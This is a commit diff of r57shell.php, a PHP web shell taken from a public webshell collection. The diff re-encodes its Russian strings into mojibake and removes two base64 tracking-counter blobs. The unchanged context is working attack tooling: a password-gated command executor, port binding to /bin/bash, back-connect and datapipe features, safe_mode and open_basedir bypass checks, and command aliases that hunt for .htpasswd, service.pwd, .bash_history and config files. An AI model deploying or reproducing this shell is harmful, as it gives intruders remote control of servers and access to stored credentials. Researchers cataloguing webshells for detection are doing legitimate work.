mirror of
https://github.com/tennc/webshell
synced 2024-11-21 18:53:03 +00:00
parent
104adac40f
commit
e0d39713dd
1 changed files with 141 additions and 159 deletions
|
@ -22,15 +22,15 @@
|
|||
/*
|
||||
/*
|
||||
/*
|
||||
/* r57shell.php - скрипт на пхп позволяющий вам выполнять шелл команды на сервере через браузер
|
||||
/* Вы можете скачать новую версию на нашем сайте: http://rst.void.ru
|
||||
/* Версия: 1.22
|
||||
/* r57shell.php - ñêðèïò íà ïõï ïîçâîëÿþùèé âàì âûïîëíÿòü øåëë êîìàíäû íà ñåðâåðå ÷åðåç áðàóçåð
|
||||
/* Âû ìîæåòå ñêà÷àòü íîâóþ âåðñèþ íà íàøåì ñàéòå: http://rst.void.ru
|
||||
/* Âåðñèÿ: 1.22
|
||||
/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
|
||||
/* (c)oded by 1dt.w0lf
|
||||
/* RST/GHC http://rst.void.ru , http://ghc.ru
|
||||
/******************************************************************************************************/
|
||||
|
||||
/* ~~~ Настройки ~~~ */
|
||||
/* ~~~ Íàñòðîéêè ~~~ */
|
||||
error_reporting(0);
|
||||
set_magic_quotes_runtime(0);
|
||||
@set_time_limit(0);
|
||||
|
@ -56,12 +56,12 @@ if (@get_magic_quotes_gpc())
|
|||
}
|
||||
}
|
||||
|
||||
/* ~~~ Аутентификация ~~~ */
|
||||
/* ~~~ Àóòåíòèôèêàöèÿ ~~~ */
|
||||
|
||||
// Логин и пароль для доступа к скрипту
|
||||
// НЕ ЗАБУДЬТЕ СМЕНИТЬ ПЕРЕД РАЗМЕЩЕНИЕМ НА СЕРВЕРЕ!!!
|
||||
$name="r57"; // логин пользователя
|
||||
$pass="r57"; // пароль пользователя
|
||||
// Ëîãèí è ïàðîëü äëÿ äîñòóïà ê ñêðèïòó
|
||||
// ÍÅ ÇÀÁÓÄÜÒÅ ÑÌÅÍÈÒÜ ÏÅÐÅÄ ÐÀÇÌÅÙÅÍÈÅÌ ÍÀ ÑÅÐÂÅÐÅ!!!
|
||||
$name="r57"; // ëîãèí ïîëüçîâàòåëÿ
|
||||
$pass="r57"; // ïàðîëü ïîëüçîâàòåëÿ
|
||||
|
||||
if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!=$name || $_SERVER['PHP_AUTH_PW']!=$pass)
|
||||
{
|
||||
|
@ -69,7 +69,7 @@ if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!=$name || $_S
|
|||
header("HTTP/1.0 401 Unauthorized");
|
||||
exit("<b><a href=http://rst.void.ru>r57shell</a> : Access Denied</b>");
|
||||
}
|
||||
$head = '<!-- Здравствуй Вася -->
|
||||
$head = '<!-- Çäðàâñòâóé Âàñÿ -->
|
||||
<html>
|
||||
<head>
|
||||
<title>r57shell</title>
|
||||
|
@ -250,101 +250,101 @@ if(isset($_GET['mem']))
|
|||
}
|
||||
|
||||
/*
|
||||
Выбор языка
|
||||
$language='ru' - русский
|
||||
$language='eng' - английский
|
||||
Âûáîð ÿçûêà
|
||||
$language='ru' - ðóññêèé
|
||||
$language='eng' - àíãëèéñêèé
|
||||
*/
|
||||
$language='ru';
|
||||
|
||||
$lang=array(
|
||||
'ru_text1' =>'Выполненная команда',
|
||||
'ru_text2' =>'Выполнение команд на сервере',
|
||||
'ru_text3' =>'Выполнить команду',
|
||||
'ru_text4' =>'Рабочая директория',
|
||||
'ru_text5' =>'Загрузка файлов на сервер',
|
||||
'ru_text6' =>'Локальный файл',
|
||||
'ru_text7' =>'Алиасы',
|
||||
'ru_text8' =>'Выберите алиас',
|
||||
'ru_butt1' =>'Выполнить',
|
||||
'ru_butt2' =>'Загрузить',
|
||||
'ru_text9' =>'Открытие порта и привязка его к /bin/bash',
|
||||
'ru_text10'=>'Открыть порт',
|
||||
'ru_text11'=>'Пароль для доступа',
|
||||
'ru_butt3' =>'Открыть',
|
||||
'ru_text1' =>'Âûïîëíåííàÿ êîìàíäà',
|
||||
'ru_text2' =>'Âûïîëíåíèå êîìàíä íà ñåðâåðå',
|
||||
'ru_text3' =>'Âûïîëíèòü êîìàíäó',
|
||||
'ru_text4' =>'Ðàáî÷àÿ äèðåêòîðèÿ',
|
||||
'ru_text5' =>'Çàãðóçêà ôàéëîâ íà ñåðâåð',
|
||||
'ru_text6' =>'Ëîêàëüíûé ôàéë',
|
||||
'ru_text7' =>'Àëèàñû',
|
||||
'ru_text8' =>'Âûáåðèòå àëèàñ',
|
||||
'ru_butt1' =>'Âûïîëíèòü',
|
||||
'ru_butt2' =>'Çàãðóçèòü',
|
||||
'ru_text9' =>'Îòêðûòèå ïîðòà è ïðèâÿçêà åãî ê /bin/bash',
|
||||
'ru_text10'=>'Îòêðûòü ïîðò',
|
||||
'ru_text11'=>'Ïàðîëü äëÿ äîñòóïà',
|
||||
'ru_butt3' =>'Îòêðûòü',
|
||||
'ru_text12'=>'back-connect',
|
||||
'ru_text13'=>'IP-адрес',
|
||||
'ru_text14'=>'Порт',
|
||||
'ru_butt4' =>'Выполнить',
|
||||
'ru_text15'=>'Загрузка файлов с удаленного сервера',
|
||||
'ru_text16'=>'Использовать',
|
||||
'ru_text17'=>'Удаленный файл',
|
||||
'ru_text18'=>'Локальный файл',
|
||||
'ru_text13'=>'IP-àäðåñ',
|
||||
'ru_text14'=>'Ïîðò',
|
||||
'ru_butt4' =>'Âûïîëíèòü',
|
||||
'ru_text15'=>'Çàãðóçêà ôàéëîâ ñ óäàëåííîãî ñåðâåðà',
|
||||
'ru_text16'=>'Èñïîëüçîâàòü',
|
||||
'ru_text17'=>'Óäàëåííûé ôàéë',
|
||||
'ru_text18'=>'Ëîêàëüíûé ôàéë',
|
||||
'ru_text19'=>'Exploits',
|
||||
'ru_text20'=>'Использовать',
|
||||
'ru_text21'=>'Новое имя',
|
||||
'ru_text20'=>'Èñïîëüçîâàòü',
|
||||
'ru_text21'=>'Íîâîå èìÿ',
|
||||
'ru_text22'=>'datapipe',
|
||||
'ru_text23'=>'Локальный порт',
|
||||
'ru_text24'=>'Удаленный хост',
|
||||
'ru_text25'=>'Удаленный порт',
|
||||
'ru_text26'=>'Использовать',
|
||||
'ru_butt5' =>'Запустить',
|
||||
'ru_text28'=>'Работа в safe_mode',
|
||||
'ru_text29'=>'Доступ запрещен',
|
||||
'ru_butt6' =>'Сменить',
|
||||
'ru_text30'=>'Просмотр файла',
|
||||
'ru_butt7' =>'Вывести',
|
||||
'ru_text31'=>'Файл не найден',
|
||||
'ru_text32'=>'Выполнение PHP кода',
|
||||
'ru_text33'=>'Проверка возможности обхода ограничений open_basedir через функции cURL',
|
||||
'ru_butt8' =>'Проверить',
|
||||
'ru_text34'=>'Проверка возможности обхода ограничений safe_mode через функцию include',
|
||||
'ru_text35'=>'Проверка возможности обхода ограничений safe_mode через загрузку файла в mysql',
|
||||
'ru_text36'=>' База',
|
||||
'ru_text37'=>'Логин',
|
||||
'ru_text38'=>'Пароль ',
|
||||
'ru_text39'=>'Таблица',
|
||||
'ru_text40'=>'Дамп таблицы mysql сервера',
|
||||
'ru_butt9' =>'Дамп',
|
||||
'ru_text41'=>'Сохранить дамп в файле',
|
||||
'ru_text42'=>'Редактирование файла',
|
||||
'ru_text43'=>'Редактировать файл',
|
||||
'ru_butt10'=>'Сохранить',
|
||||
'ru_butt11'=>'Редактировать',
|
||||
'ru_text44'=>'Редактирование файла невозможно! Доступ только для чтения!',
|
||||
'ru_text45'=>'Файл сохранен',
|
||||
'ru_text46'=>'Просмотр phpinfo()',
|
||||
'ru_text47'=>'Просмотр настроек php.ini',
|
||||
'ru_text48'=>'Удаление временных файлов',
|
||||
'ru_text49'=>'Удаление скрипта с сервера',
|
||||
'ru_text50'=>'Информация о процессоре',
|
||||
'ru_text51'=>'Информация о памяти',
|
||||
'ru_text52'=>'Текст для поиска',
|
||||
'ru_text53'=>'Искать в папке',
|
||||
'ru_text54'=>'Поиск текста в файлах',
|
||||
'ru_butt12'=>'Найти',
|
||||
'ru_text55'=>'Только в файлах',
|
||||
'ru_text56'=>'Ничего не найдено',
|
||||
'ru_text57'=>'Создать/Удалить Файл/Директорию',
|
||||
'ru_text58'=>'Имя',
|
||||
'ru_text59'=>'Файл',
|
||||
'ru_text60'=>'Директорию',
|
||||
'ru_butt13'=>'Создать/Удалить',
|
||||
'ru_text61'=>'Файл создан',
|
||||
'ru_text62'=>'Директория создана',
|
||||
'ru_text63'=>'Файл удален',
|
||||
'ru_text64'=>'Директория удалена',
|
||||
'ru_text65'=>'Создать',
|
||||
'ru_text66'=>'Удалить',
|
||||
'ru_text23'=>'Ëîêàëüíûé ïîðò',
|
||||
'ru_text24'=>'Óäàëåííûé õîñò',
|
||||
'ru_text25'=>'Óäàëåííûé ïîðò',
|
||||
'ru_text26'=>'Èñïîëüçîâàòü',
|
||||
'ru_butt5' =>'Çàïóñòèòü',
|
||||
'ru_text28'=>'Ðàáîòà â safe_mode',
|
||||
'ru_text29'=>'Äîñòóï çàïðåùåí',
|
||||
'ru_butt6' =>'Ñìåíèòü',
|
||||
'ru_text30'=>'Ïðîñìîòð ôàéëà',
|
||||
'ru_butt7' =>'Âûâåñòè',
|
||||
'ru_text31'=>'Ôàéë íå íàéäåí',
|
||||
'ru_text32'=>'Âûïîëíåíèå PHP êîäà',
|
||||
'ru_text33'=>'Ïðîâåðêà âîçìîæíîñòè îáõîäà îãðàíè÷åíèé open_basedir ÷åðåç ôóíêöèè cURL',
|
||||
'ru_butt8' =>'Ïðîâåðèòü',
|
||||
'ru_text34'=>'Ïðîâåðêà âîçìîæíîñòè îáõîäà îãðàíè÷åíèé safe_mode ÷åðåç ôóíêöèþ include',
|
||||
'ru_text35'=>'Ïðîâåðêà âîçìîæíîñòè îáõîäà îãðàíè÷åíèé safe_mode ÷åðåç çàãðóçêó ôàéëà â mysql',
|
||||
'ru_text36'=>' Áàçà',
|
||||
'ru_text37'=>'Ëîãèí',
|
||||
'ru_text38'=>'Ïàðîëü ',
|
||||
'ru_text39'=>'Òàáëèöà',
|
||||
'ru_text40'=>'Äàìï òàáëèöû mysql ñåðâåðà',
|
||||
'ru_butt9' =>'Äàìï',
|
||||
'ru_text41'=>'Ñîõðàíèòü äàìï â ôàéëå',
|
||||
'ru_text42'=>'Ðåäàêòèðîâàíèå ôàéëà',
|
||||
'ru_text43'=>'Ðåäàêòèðîâàòü ôàéë',
|
||||
'ru_butt10'=>'Ñîõðàíèòü',
|
||||
'ru_butt11'=>'Ðåäàêòèðîâàòü',
|
||||
'ru_text44'=>'Ðåäàêòèðîâàíèå ôàéëà íåâîçìîæíî! Äîñòóï òîëüêî äëÿ ÷òåíèÿ!',
|
||||
'ru_text45'=>'Ôàéë ñîõðàíåí',
|
||||
'ru_text46'=>'Ïðîñìîòð phpinfo()',
|
||||
'ru_text47'=>'Ïðîñìîòð íàñòðîåê php.ini',
|
||||
'ru_text48'=>'Óäàëåíèå âðåìåííûõ ôàéëîâ',
|
||||
'ru_text49'=>'Óäàëåíèå ñêðèïòà ñ ñåðâåðà',
|
||||
'ru_text50'=>'Èíôîðìàöèÿ î ïðîöåññîðå',
|
||||
'ru_text51'=>'Èíôîðìàöèÿ î ïàìÿòè',
|
||||
'ru_text52'=>'Òåêñò äëÿ ïîèñêà',
|
||||
'ru_text53'=>'Èñêàòü â ïàïêå',
|
||||
'ru_text54'=>'Ïîèñê òåêñòà â ôàéëàõ',
|
||||
'ru_butt12'=>'Íàéòè',
|
||||
'ru_text55'=>'Òîëüêî â ôàéëàõ',
|
||||
'ru_text56'=>'Íè÷åãî íå íàéäåíî',
|
||||
'ru_text57'=>'Ñîçäàòü/Óäàëèòü Ôàéë/Äèðåêòîðèþ',
|
||||
'ru_text58'=>'Èìÿ',
|
||||
'ru_text59'=>'Ôàéë',
|
||||
'ru_text60'=>'Äèðåêòîðèþ',
|
||||
'ru_butt13'=>'Ñîçäàòü/Óäàëèòü',
|
||||
'ru_text61'=>'Ôàéë ñîçäàí',
|
||||
'ru_text62'=>'Äèðåêòîðèÿ ñîçäàíà',
|
||||
'ru_text63'=>'Ôàéë óäàëåí',
|
||||
'ru_text64'=>'Äèðåêòîðèÿ óäàëåíà',
|
||||
'ru_text65'=>'Ñîçäàòü',
|
||||
'ru_text66'=>'Óäàëèòü',
|
||||
'ru_text67'=>'Chown/Chgrp/Chmod',
|
||||
'ru_text68'=>'Команда',
|
||||
'ru_text69'=>'Параметр1',
|
||||
'ru_text70'=>'Параметр2',
|
||||
'ru_text71'=>"Второй параметр команды:\r\n- для CHOWN - имя нового пользователя или его UID (числом) \r\n- для команды CHGRP - имя группы или GID (числом) \r\n- для команды CHMOD - целое число в восьмеричном представлении (например 0777)",
|
||||
'ru_text72'=>'Текст для поиска',
|
||||
'ru_text73'=>'Искать в папке',
|
||||
'ru_text74'=>'Искать в файлах',
|
||||
'ru_text75'=>'* можно использовать регулярное выражение',
|
||||
'ru_text76'=>'Поиск текста в файлах с помощью утилиты find',
|
||||
'ru_text68'=>'Êîìàíäà',
|
||||
'ru_text69'=>'Ïàðàìåòð1',
|
||||
'ru_text70'=>'Ïàðàìåòð2',
|
||||
'ru_text71'=>"Âòîðîé ïàðàìåòð êîìàíäû:\r\n- äëÿ CHOWN - èìÿ íîâîãî ïîëüçîâàòåëÿ èëè åãî UID (÷èñëîì) \r\n- äëÿ êîìàíäû CHGRP - èìÿ ãðóïïû èëè GID (÷èñëîì) \r\n- äëÿ êîìàíäû CHMOD - öåëîå ÷èñëî â âîñüìåðè÷íîì ïðåäñòàâëåíèè (íàïðèìåð 0777)",
|
||||
'ru_text72'=>'Òåêñò äëÿ ïîèñêà',
|
||||
'ru_text73'=>'Èñêàòü â ïàïêå',
|
||||
'ru_text74'=>'Èñêàòü â ôàéëàõ',
|
||||
'ru_text75'=>'* ìîæíî èñïîëüçîâàòü ðåãóëÿðíîå âûðàæåíèå',
|
||||
'ru_text76'=>'Ïîèñê òåêñòà â ôàéëàõ ñ ïîìîùüþ óòèëèòû find',
|
||||
/* --------------------------------------------------------------- */
|
||||
'eng_text1' =>'Executed command',
|
||||
'eng_text2' =>'Execute command on server',
|
||||
|
@ -437,59 +437,59 @@ $lang=array(
|
|||
);
|
||||
|
||||
/*
|
||||
Алиасы команд
|
||||
Позволяют избежать многократного набора одних и тех-же команд. ( Сделано благодаря моей природной лени )
|
||||
Вы можете сами добавлять или изменять команды.
|
||||
Àëèàñû êîìàíä
|
||||
Ïîçâîëÿþò èçáåæàòü ìíîãîêðàòíîãî íàáîðà îäíèõ è òåõ-æå êîìàíä. ( Ñäåëàíî áëàãîäàðÿ ìîåé ïðèðîäíîé ëåíè )
|
||||
Âû ìîæåòå ñàìè äîáàâëÿòü èëè èçìåíÿòü êîìàíäû.
|
||||
*/
|
||||
|
||||
$aliases=array(
|
||||
/* поиск на сервере всех файлов с suid битом */
|
||||
/* ïîèñê íà ñåðâåðå âñåõ ôàéëîâ ñ suid áèòîì */
|
||||
'find suid files'=>'find / -type f -perm -04000 -ls',
|
||||
/* поиск в текущей директории всех файлов с suid битом */
|
||||
/* ïîèñê â òåêóùåé äèðåêòîðèè âñåõ ôàéëîâ ñ suid áèòîì */
|
||||
'find suid files in current dir'=>'find . -type f -perm -04000 -ls',
|
||||
/* поиск на сервере всех файлов с sgid битом */
|
||||
/* ïîèñê íà ñåðâåðå âñåõ ôàéëîâ ñ sgid áèòîì */
|
||||
'find sgid files'=>'find / -type f -perm -02000 -ls',
|
||||
/* поиск в текущей директории всех файлов с sgid битом */
|
||||
/* ïîèñê â òåêóùåé äèðåêòîðèè âñåõ ôàéëîâ ñ sgid áèòîì */
|
||||
'find sgid files in current dir'=>'find . -type f -perm -02000 -ls',
|
||||
/* поиск на сервере файлов config.inc.php */
|
||||
/* ïîèñê íà ñåðâåðå ôàéëîâ config.inc.php */
|
||||
'find config.inc.php files'=>'find / -type f -name config.inc.php',
|
||||
/* поиск в тек дире config.inc.php */
|
||||
/* ïîèñê â òåê äèðå config.inc.php */
|
||||
'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php',
|
||||
/* поиск на сервере файлов config* */
|
||||
/* ïîèñê íà ñåðâåðå ôàéëîâ config* */
|
||||
'find config* files'=>'find / -type f -name "config*"',
|
||||
/* поиск в текущей директории файлов config* */
|
||||
/* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ config* */
|
||||
'find config* files in current dir'=>'find . -type f -name "config*"',
|
||||
/* поиск на сервере всех файлов доступных на запись для всех */
|
||||
/* ïîèñê íà ñåðâåðå âñåõ ôàéëîâ äîñòóïíûõ íà çàïèñü äëÿ âñåõ */
|
||||
'find all writable files'=>'find / -type f -perm -2 -ls',
|
||||
/* поиск в текущей директории всех файлов доступных на запись для всех */
|
||||
/* ïîèñê â òåêóùåé äèðåêòîðèè âñåõ ôàéëîâ äîñòóïíûõ íà çàïèñü äëÿ âñåõ */
|
||||
'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
|
||||
/* поиск на сервере всех директорий доступных на запись для всех */
|
||||
/* ïîèñê íà ñåðâåðå âñåõ äèðåêòîðèé äîñòóïíûõ íà çàïèñü äëÿ âñåõ */
|
||||
'find all writable directories'=>'find / -type d -perm -2 -ls',
|
||||
/* поиск в текущей директории всех директорий доступных на запись для всех */
|
||||
/* ïîèñê â òåêóùåé äèðåêòîðèè âñåõ äèðåêòîðèé äîñòóïíûõ íà çàïèñü äëÿ âñåõ */
|
||||
'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
|
||||
/* поиск на сервере всех директорий и файлов доступных на запись для всех */
|
||||
/* ïîèñê íà ñåðâåðå âñåõ äèðåêòîðèé è ôàéëîâ äîñòóïíûõ íà çàïèñü äëÿ âñåõ */
|
||||
'find all writable directories and files'=>'find / -perm -2 -ls',
|
||||
/* поиск в текущей директории всех директорий и файлов доступных на запись для всех */
|
||||
/* ïîèñê â òåêóùåé äèðåêòîðèè âñåõ äèðåêòîðèé è ôàéëîâ äîñòóïíûõ íà çàïèñü äëÿ âñåõ */
|
||||
'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
|
||||
/* поиск на сервере файлов service.pwd ... frontpage =))) */
|
||||
/* ïîèñê íà ñåðâåðå ôàéëîâ service.pwd ... frontpage =))) */
|
||||
'find all service.pwd files'=>'find / -type f -name service.pwd',
|
||||
/* поиск в текущей директории файлов service.pwd */
|
||||
/* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ service.pwd */
|
||||
'find service.pwd files in current dir'=>'find . -type f -name service.pwd',
|
||||
/* поиск на сервере файлов .htpasswd */
|
||||
/* ïîèñê íà ñåðâåðå ôàéëîâ .htpasswd */
|
||||
'find all .htpasswd files'=>'find / -type f -name .htpasswd',
|
||||
/* поиск в текущей директории файлов .htpasswd */
|
||||
/* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ .htpasswd */
|
||||
'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd',
|
||||
/* поиск всех файлов .bash_history */
|
||||
/* ïîèñê âñåõ ôàéëîâ .bash_history */
|
||||
'find all .bash_history files'=>'find / -type f -name .bash_history',
|
||||
/* поиск в текущей директории файлов .bash_history */
|
||||
/* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ .bash_history */
|
||||
'find .bash_history files in current dir'=>'find . -type f -name .bash_history',
|
||||
/* поиск всех файлов .fetchmailrc */
|
||||
/* ïîèñê âñåõ ôàéëîâ .fetchmailrc */
|
||||
'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc',
|
||||
/* поиск в текущей директории файлов .fetchmailrc */
|
||||
/* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ .fetchmailrc */
|
||||
'find .fetchmailrc files in current dir'=>'find . -type f -name .fetchmailrc',
|
||||
/* вывод списка атрибутов файлов на файловой системе ext2fs */
|
||||
/* âûâîä ñïèñêà àòðèáóòîâ ôàéëîâ íà ôàéëîâîé ñèñòåìå ext2fs */
|
||||
'list file attributes on a Linux second extended file system'=>'lsattr -va',
|
||||
/* просмотр открытых портов */
|
||||
/* ïðîñìîòð îòêðûòûõ ïîðòîâ */
|
||||
'show opened ports'=>'netstat -an | grep -i listen',
|
||||
'----------------------------------------------------------------------------------------------------'=>'ls -la'
|
||||
);
|
||||
|
@ -499,7 +499,7 @@ $table_up1 = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=
|
|||
$table_up2 = " ::</div></b></font></td></tr><tr><td>";
|
||||
$table_up3 = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc>";
|
||||
$table_end1 = "</td></tr>";
|
||||
$arrow = " <font face=Wingdings color=gray>и</font>";
|
||||
$arrow = " <font face=Wingdings color=gray>è</font>";
|
||||
$lb = "<font color=black>[</font>";
|
||||
$rb = "<font color=black>]</font>";
|
||||
$font = "<font face=Verdana size=-2>";
|
||||
|
@ -513,10 +513,10 @@ $windows = 0;
|
|||
$unix = 0;
|
||||
if(strlen($dir)>1 && $dir[1]==":") $windows=1; else $unix=1;
|
||||
if(empty($dir))
|
||||
{ // на случай если не удалось получить директорию
|
||||
{ // íà ñëó÷àé åñëè íå óäàëîñü ïîëó÷èòü äèðåêòîðèþ
|
||||
$os = getenv('OS');
|
||||
if(empty($os)){ $os = php_uname(); } // пробуем получить через php_uname()
|
||||
if(empty($os)){ $os ="-"; $unix=1; } // если ничего не получилось то будет unix =)
|
||||
if(empty($os)){ $os = php_uname(); } // ïðîáóåì ïîëó÷èòü ÷åðåç php_uname()
|
||||
if(empty($os)){ $os ="-"; $unix=1; } // åñëè íè÷åãî íå ïîëó÷èëîñü òî áóäåò unix =)
|
||||
else
|
||||
{
|
||||
if(@eregi("^win",$os)) { $windows = 1; }
|
||||
|
@ -565,9 +565,9 @@ if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd'])
|
|||
die(); // show founded strings and die
|
||||
}
|
||||
|
||||
/* Проверка того можем ли мы выполнять команды при выключенном safe_mode. Если нет то считаем что сейф включен */
|
||||
/* Обходит невозможность выполнения команд на винде когда сейф выключен но cmd.exe переименован */
|
||||
/* либо когда в php.ini прописаны disable_functions */
|
||||
/* Ïðîâåðêà òîãî ìîæåì ëè ìû âûïîëíÿòü êîìàíäû ïðè âûêëþ÷åííîì safe_mode. Åñëè íåò òî ñ÷èòàåì ÷òî ñåéô âêëþ÷åí */
|
||||
/* Îáõîäèò íåâîçìîæíîñòü âûïîëíåíèÿ êîìàíä íà âèíäå êîãäà ñåéô âûêëþ÷åí íî cmd.exe ïåðåèìåíîâàí */
|
||||
/* ëèáî êîãäà â php.ini ïðîïèñàíû disable_functions */
|
||||
if($windows&&!$safe_mode)
|
||||
{
|
||||
$uname = ex("ver");
|
||||
|
@ -632,7 +632,7 @@ function ex($cfe)
|
|||
/* write error */
|
||||
function we($i)
|
||||
{
|
||||
if($GLOBALS['language']=="ru"){ $text = 'Ошибка! Не могу записать в файл '; }
|
||||
if($GLOBALS['language']=="ru"){ $text = 'Îøèáêà! Íå ìîãó çàïèñàòü â ôàéë '; }
|
||||
else { $text = "[-] ERROR! Can't write in file "; }
|
||||
echo "<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
|
||||
}
|
||||
|
@ -640,7 +640,7 @@ echo "<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#cccccc><fon
|
|||
/* read error */
|
||||
function re($i)
|
||||
{
|
||||
if($GLOBALS['language']=="ru"){ $text = 'Ошибка! Не могу прочитать файл '; }
|
||||
if($GLOBALS['language']=="ru"){ $text = 'Îøèáêà! Íå ìîãó ïðî÷èòàòü ôàéë '; }
|
||||
else { $text = "[-] ERROR! Can't read file "; }
|
||||
echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
|
||||
}
|
||||
|
@ -648,7 +648,7 @@ echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgco
|
|||
/* create error */
|
||||
function ce($i)
|
||||
{
|
||||
if($GLOBALS['language']=="ru"){ $text = "Не удалось создать "; }
|
||||
if($GLOBALS['language']=="ru"){ $text = "Íå óäàëîñü ñîçäàòü "; }
|
||||
else { $text = "Can't create "; }
|
||||
echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
|
||||
}
|
||||
|
@ -1022,25 +1022,7 @@ DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSU
|
|||
ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J
|
||||
1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo=";
|
||||
/* --- END datapipe.pl ----------------------------------------------------------------------------------------- */
|
||||
$c1 = "PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+aG90bG9nX2pzPSIxLjAiO2hvdGxvZ19yPSIiK01hdGgucmFuZG9tKCkrIiZzPTgxNjA2
|
||||
JmltPTEmcj0iK2VzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrIiZwZz0iK2VzY2FwZSh3aW5kb3cubG9jYXRpb24uaHJlZik7ZG9jdW1lbnQuY29va2l
|
||||
lPSJob3Rsb2c9MTsgcGF0aD0vIjsgaG90bG9nX3IrPSImYz0iKyhkb2N1bWVudC5jb29raWU/IlkiOiJOIik7PC9zY3JpcHQ+PHNjcmlwdCBsYW5ndW
|
||||
FnZT0iamF2YXNjcmlwdDEuMSI+aG90bG9nX2pzPSIxLjEiO2hvdGxvZ19yKz0iJmo9IisobmF2aWdhdG9yLmphdmFFbmFibGVkKCk/IlkiOiJOIik8L
|
||||
3NjcmlwdD48c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0MS4yIj5ob3Rsb2dfanM9IjEuMiI7aG90bG9nX3IrPSImd2g9IitzY3JlZW4ud2lkdGgr
|
||||
J3gnK3NjcmVlbi5oZWlnaHQrIiZweD0iKygoKG5hdmlnYXRvci5hcHBOYW1lLnN1YnN0cmluZygwLDMpPT0iTWljIikpP3NjcmVlbi5jb2xvckRlcHR
|
||||
oOnNjcmVlbi5waXhlbERlcHRoKTwvc2NyaXB0PjxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQxLjMiPmhvdGxvZ19qcz0iMS4zIjwvc2NyaXB0Pj
|
||||
xzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQiPmhvdGxvZ19yKz0iJmpzPSIraG90bG9nX2pzO2RvY3VtZW50LndyaXRlKCI8YSBocmVmPSdodHRwO
|
||||
i8vY2xpY2suaG90bG9nLnJ1Lz84MTYwNicgdGFyZ2V0PSdfdG9wJz48aW1nICIrIiBzcmM9J2h0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2hv
|
||||
dGxvZy9jb3VudD8iK2hvdGxvZ19yKyImJyBib3JkZXI9MCB3aWR0aD0xIGhlaWdodD0xIGFsdD0xPjwvYT4iKTwvc2NyaXB0Pjxub3NjcmlwdD48YSB
|
||||
ocmVmPWh0dHA6Ly9jbGljay5ob3Rsb2cucnUvPzgxNjA2IHRhcmdldD1fdG9wPjxpbWdzcmM9Imh0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2
|
||||
hvdGxvZy9jb3VudD9zPTgxNjA2JmltPTEiIGJvcmRlcj0wd2lkdGg9IjEiIGhlaWdodD0iMSIgYWx0PSJIb3RMb2ciPjwvYT48L25vc2NyaXB0Pg==";
|
||||
$c2 = "PCEtLUxpdmVJbnRlcm5ldCBjb3VudGVyLS0+PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCI+PCEtLQ0KZG9jdW1lbnQud3JpdGUoJzxh
|
||||
IGhyZWY9Imh0dHA6Ly93d3cubGl2ZWludGVybmV0LnJ1L2NsaWNrIiAnKw0KJ3RhcmdldD1fYmxhbms+PGltZyBzcmM9Imh0dHA6Ly9jb3VudGVyLnl
|
||||
hZHJvLnJ1L2hpdD90NTIuNjtyJysNCmVzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrKCh0eXBlb2Yoc2NyZWVuKT09J3VuZGVmaW5lZCcpPycnOg0KJz
|
||||
tzJytzY3JlZW4ud2lkdGgrJyonK3NjcmVlbi5oZWlnaHQrJyonKyhzY3JlZW4uY29sb3JEZXB0aD8NCnNjcmVlbi5jb2xvckRlcHRoOnNjcmVlbi5wa
|
||||
XhlbERlcHRoKSkrJzsnK01hdGgucmFuZG9tKCkrDQonIiBhbHQ9ImxpdmVpbnRlcm5ldC5ydTog7+7q4Ofg7e4g9+jx6+4g7/Du8ezu8vDu4iDoIO/u
|
||||
8eXy6PLl6+XpIOfgIDI0IPfg8eAiICcrDQonYm9yZGVyPTAgd2lkdGg9MCBoZWlnaHQ9MD48L2E+JykvLy0tPjwvc2NyaXB0PjwhLS0vTGl2ZUludGV
|
||||
ybmV0LS0+";
|
||||
|
||||
